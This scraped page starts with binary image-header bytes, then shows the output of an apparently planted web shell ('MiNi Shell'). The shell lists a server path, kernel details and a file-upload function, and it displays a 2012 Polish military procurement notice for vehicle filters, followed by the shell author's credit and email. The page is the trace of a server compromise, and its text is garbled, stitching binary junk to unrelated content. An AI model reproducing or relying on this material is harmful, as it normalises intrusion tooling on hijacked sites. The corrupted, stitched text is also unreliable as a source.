JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121005/383824-N-2012.html

<p class="kh_header"><b>Grudziądz: DOSTAWA FILTRÓW DO POJAZDÓW SAMOCHODOWYCH - sprawa nr 101/2012</b><br>
<b>Numer ogłoszenia: 383824 - 2012; data zamieszczenia: 05.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Sektora Finansów Publicznych - Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA FILTRÓW DO POJAZDÓW SAMOCHODOWYCH - sprawa nr 101/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa filtrów do pojazdów samochodowych do Jednostki 
Wojskowej 4503 - magazyn przy ulicy Bema 2, 86-300 Grudziądzu, zgodnie z wymaganiami określonymi przez Zamawiającego w ilościach i rodzaju następująco:
LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
1.	WKŁAD FILTRA POWIETRZA /DONALDSON/ EC niski/ st. nr 42554488 katalog: 42558096	szt.	26
2.	FILTR PALIWA WSTĘPNY EC, TRACKER, STRALIS katalog: 2992662	szt.	26
3.	FILTR DOKŁADNEGO OCZYSZCZANIA EC katalog: 2992241	szt.	26
4.	FILTR OLEJU SILNIKOWEGO / TECTOR / EC katalog: 2992242	szt.	26
5.	FILTR PRZECIWPYŁOWY EC katalog: 504119162	szt.	26
6.	FILTR OSUSZACZA POWIETRZA TRAKKER, STRALIS EC-/13BAR/ katalog: 2992261	szt.	26
7.	FILTR OLEJU OC 602	szt.	1
8.	FILTR OLEJU OE 650/2	szt.	1
9.	FILTR OLEJU OE 666/2	szt.	1
10.	FILTR OLEJU OE 673	szt.	2
11.	FILTR OLEJU OM 500/1	szt.	34
12.	FILTR OLEJU OM 504	szt.	600
13.	FILTR OLEJU OM 529	szt.	3
14.	FILTR OLEJU OP 504	szt.	36
15.	FILTR OLEJU OP 520	szt.	4
16.	FILTR OLEJU OP 592/9	szt.	1
17.	FILTR OLEJU OP 532/1	szt.	1
18.	FILTR OLEJU OP 537/1	szt.	3
19.	FILTR OLEJU OP 540/1	szt.	21
LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
20.	FILTR OLEJU OP 543	szt.	3
21.	FILTR OLEJU OP 545	szt.	4
22.	FILTR OLEJU OP 550	szt.	2
23.	FILTR OLEJU OP 563/1	szt.	61
24.	FILTR OLEJU OP 569	szt.	1
25.	FILTR OLEJU OP 570	szt.	3
26.	FILTR OLEJU OP 588	szt.	1
27.	FILTR OLEJU OP 592/6	szt.	22
28.	FILTR OLEJU OP 592/8	szt.	2
29.	FILTR OLEJU OP 594	szt.	28
30.	FILTR OLEJU OP 626	szt.	118
31.	FILTR OLEJU OP 626/6	szt.	8
32.	FILTR OLEJU OP 643/3	szt.	1
33.	FILTR OLEJU OP 643/4	szt.	1
34.	FILTR OLEJU OP 647	szt.	3
35.	FILTR PALIWA PM 800	szt.	5
36.	FILTR PALIWA PM 801	szt.	3
37.	FILTR PALIWA PM 802	szt.	3
38.	FILTR PALIWA PM 805	szt.	24
39.	FILTR PALIWA PM 808	szt.	8
40.	FILTR PALIWA PM 815/3	szt.	2
41.	FILTR PALIWA PM 818	szt.	12
42.	FILTR PALIWA PM 818/2	szt.	12
43.	FILTR PALIWA PM 819	szt.	500
44.	FILTR PALIWA PM 819/1	szt.	41
45.	FILTR PALIWA PM 819/2	szt.	20
46.	FILTR PALIWA PP 831	szt.	3
47.	FILTR PALIWA PP 836/2	szt.	1
48.	FILTR PALIWA PP 837	szt.	19
49.	FILTR PALIWA PP 837/1	szt.	114
50.	FILTR PALIWA PP 841	szt.	1
51.	FILTR PALIWA PP 845/1	szt.	2
52.	FILTR PALIWA PP 966/3	szt.	2
53.	FILTR PALIWA PP 848	szt.	4
54.	FILTR PALIWA PP 857	szt.	1
55.	FILTR PALIWA PP 861/6	szt.	37
56.	FILTR PALIWA 865	szt.	1
57.	FILTR PALIWA PP 968	szt.	3
58.	FILTR PALIWA PP 879/3	szt.	9
59.	FILTR PALIWA PP 879/5	szt.	37
60.	FILTR PALIWA PP 905	szt.	1
61.	FILTR PALIWA PP 907	szt.	1
62.	FILTR PALIWA PS 820	szt.	1
63.	FILTR PALIWA PS 822	szt.	2
64.	FILTR PALIWA PS 921	szt.	3
65.	FILTR PALIWA PW 804	szt.	24
66.	FILTR PALIWA PW 809	szt.	12
67.	FILTR PALIWA PE 982	szt.	3
68.	FILTR POWIETRZA AG 248/1	szt.	18
69.	FILTR POWIETRZA AM 400/1	szt.	12
70.	FILTR POWIETRZA AM 400/2	szt.	5
71.	FILTR POWIETRZA AM 401	szt.	3
72.	FILTR POWIETRZA AM 404	szt.	22
73.	FILTR POWIETRZA AM 405	szt.	19
74.	AM FILTR POWIETRZA 405/W	szt.	8
75.	FILTR POWIETRZA AM 417	szt.	1
76.	FILTR POWIETRZA AM 420	szt.	70
77.	FILTR POWIETRZA AM 446/2	szt.	8
78.	FILTR POWIETRZA AM 454	szt.	1
79.	FILTR POWIETRZA AP 023	szt.	2
LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
80.	FILTR POWIETRZA AP 050	szt.	1
81.	FILTR POWIETRZA AP 061	szt.	1
82.	FILTR POWIETRZA AP 074	szt.	1
83.	FILTR POWIETRZA AP 076	szt.	1
84.	FILTR POWIETRZA AP 134/2	szt.	1
85.	FILTR POWIETRZA AP 137/3	szt.	1
86.	FILTR POWIETRZA AP 149/7	szt.	1
87.	FILTR POWIETRZA AP 155	szt.	3
88.	FILTR POWIETRZA AR 214	szt.	6
89.	FILTR POWIETRZA AR 232/1	szt.	3
90.	FILTR POWIETRZA AR 233	szt.	17
91.	FILTR POWIETRZA AR 233/1	szt.	5
92.	FILTR POWIETRZA AR 275	szt.	1
93.	FILTR POWIETRZA AR 285	szt.	69
94.	FILTR POWIETRZA AR 288	szt.	12
95.	FILTR POWIETRZA AR 316	szt.	3
96.	FILTR POWIETRZA AR 316/1	szt.	5
97.	OSUSZACZ AD 785	szt.	99
98.	FILTR UKŁADU WSPOMAGANIA OM 547	szt.	300
99.	FILTR UKŁADU WSPOMAGANIA OP 647	szt.	3
100.	WKŁAD HYDRAULICZNY WH10-65x	szt.	2
101.	OSUSZACZ POWIETRZA OGRZEW. STAR 1466 katalog: 81.52102-6120	szt.	3

Dostarczany przedmiot zamówienia musi odpowiadać wymogom określonym w ustawie z dnia 30 sierpnia 2002 roku o systemie oceny zgodności (D.U. z 2004 r.  nr 204, poz. 2087 ze zm.).
Dostarczane wyroby muszą być opakowane w sposób zapewniający zachowanie ich właściwości oraz parametrów techniczno-eksploatacyjnych podczas transportu i przechowywania w warunkach magazynowych.
Wykonawca udzieli Zamawiającemu gwarancję na niezawodną pracę oferowanego przedmiotu zamówienia na okres 24 miesięcy od daty protokolarnego odbioru dostawy.
Wraz z dostawą Wykonawca zobowiązany jest dostarczyć:
1)	karty gwarancyjne lub inny dokument, stanowiący dowód udzielenia gwarancji, będący podstawą do dochodzenia roszczeń z tytułu gwarancji;
2)	zbiorcze świadectwo jakości.
Dostarczony przedmiot zamówienia musi być wykonany zgodnie z dokumentacją techniczną i wymaganiami technicznymi opracowanymi przez producenta. Wszystkie produkty objęte przedmiotem zamówienia w niniejszym postępowaniu winny być nowe, nieużywane, nieregenerowane i w kategorii pierwszej, spełniające wymagania jakościowe określone w dokumentacji technicznej producenta danego wyrobu. 
Zamawiający dopuszcza rozwiązania równoważne opisywanym w Załączniku Nr 1 SIWZ (podstawa prawna art. 30 ust 4 ustawy).
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego w ust. 1 Rozdziału III  treści SIWZ (podstawa prawna art. 30 ust. 5 ustawy). Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego w Załączniku nr 1 do SIWZ w zw. z ust. 1 Rozdziału III treści SIWZ (podstawa prawna art. 30 ust. 5 ustawy) przedkładając wraz z ofertą:
1)	Oświadczenie Producenta lub Wykonawcy składającego ofertę, iż oferuje produkty równoważne wraz 
z wykazem produktów których równoważność dotyczy;
2)	Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, opis itp.
Powyższe dokumenty wymagane są na potwierdzenie że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w Załączniku nr 1 SIWZ (Podstawa: § 5 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia  2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane; Dz. U. Nr 226, poz. 1817).
Szczegółowy opis warunków realizacji przedmiotu zamówienia określa Załącznik Nr 2 do SIWZ stanowiący Ogólne Warunki Umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców składających ofertę wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą winien przedłożyć następujące załączniki: Nr 1 - Formularz ofertowy; Nr 3 - Oświadczenie o spełnieniu warunków udziału; Nr 4 - Oświadczenie o braku podstaw do  wykluczenia z postępowania; Nr 5 - Wykaz części zamówienia, które Wykonawca powierza do realizacji podwykonawcy; Nr 6 - Informacja o Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy  w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, z tymże zmiany nie mogą powodować negatywnych skutków finansowych, jakościowych ani organizacyjnych dla Zamawiającego.  Zakres przewidywanych istotnych zmian oraz warunki tych zmian:
1)	zmiana podwykonawcy uczestniczącego w realizacji umowy w wypadku kiedy Wykonawca określi go co do tożsamości w ofercie;
2)	miejsca dostawy (miasto Grudziądz, Chełmno, Brodnica) o ile wystąpią uzasadnione okoliczności po stronie Zamawiającego, których nie można było przewidzieć przed podpisaniem umowy; 
3)	zmiany przedmiotu  zamówienia  na przedmiot zamówienia innego producenta niż wskazany w ofercie przez Wykonawcę przy zachowaniu cen i wymagań wskazanych  w umowie oraz jakości nie gorszej niż wymagana; 
4)	terminu realizacji, w przypadku zaistnienia po stronie Wykonawcy udowodnionych okoliczności nie powstałych z winy Wykonawcy lub w przypadku zaistnienia po stronie Zamawiającego okoliczności uniemożliwiających przyjęcie dostawy w terminie określonym w Rozdziale V SIWZ nie powstałych z winy Zamawiającego, z tymże termin ten nie może być dłuższy niż do 20.11.2012 r. 
5)	dopuszcza się możliwość zmiany formy dostawy z jednorazowej na kilkukrotną o ile to będzie organizacyjnie możliwe ze strony Zamawiającego a taka forma dostawy nie spowoduje żadnych negatywnych skutków w zakresie realizacji umowy i jej terminu zakończenia.
6)	zmiany świadczenia Wykonawcy (w zakresie typu, rodzaju, nazwy przedmiotu zamówienia) 
w sytuacji gdy zmówiony przedmiot zamówienia nie może być dostarczony np. z powodu zakończenia produkcji, niedostępności na rynku, zmiany warunków technicznych, z zastrzeżeniem, iż nowe artykuły będą charakteryzowały się lepszymi parametrami w całości bądź w części (w każdym przypadku nie będą one gorsze niż przedmiot zamówienia) przy zachowaniu cen wskazanych w umowie i jakości nie gorszej niż wymagana.
Zmiany jak powyżej  pkt 1 - 6 (z wyjątkiem pkt. 5) wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> z kasy JW 4503 ul. Czwartaków 1,86-300 Grudziądz:7zł, na wniosek Wykonawcy -wysyłka: 14,15 zł lub bezpłatnie z www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 07:30, miejsce: kancelaria JW 4503 ul.Czwartaków 1 86-300 Grudziądz (pom. 7 bud. 1)-osobiście lub przesyłka, wykonawca winien uwzględnić czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: OFERTA: DOSTAWA FILTRÓW DO POJAZDÓW SAMOCHODOWYCH - sprawa nr 101/2012
nie otwierać do dnia 23.10.2012 r. do godziny 8.00. Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu  nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi).
Wykonawca dla zachowania terminu składania ofert winien uwzględnić czas niezbędny na wystawienie przez osobę pełniącą służbę w biurze przepustek, przepustki upoważniającej do wejścia do kancelarii zamawiającego oraz czas niezbędny na przejście do kancelarii i złożenie ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com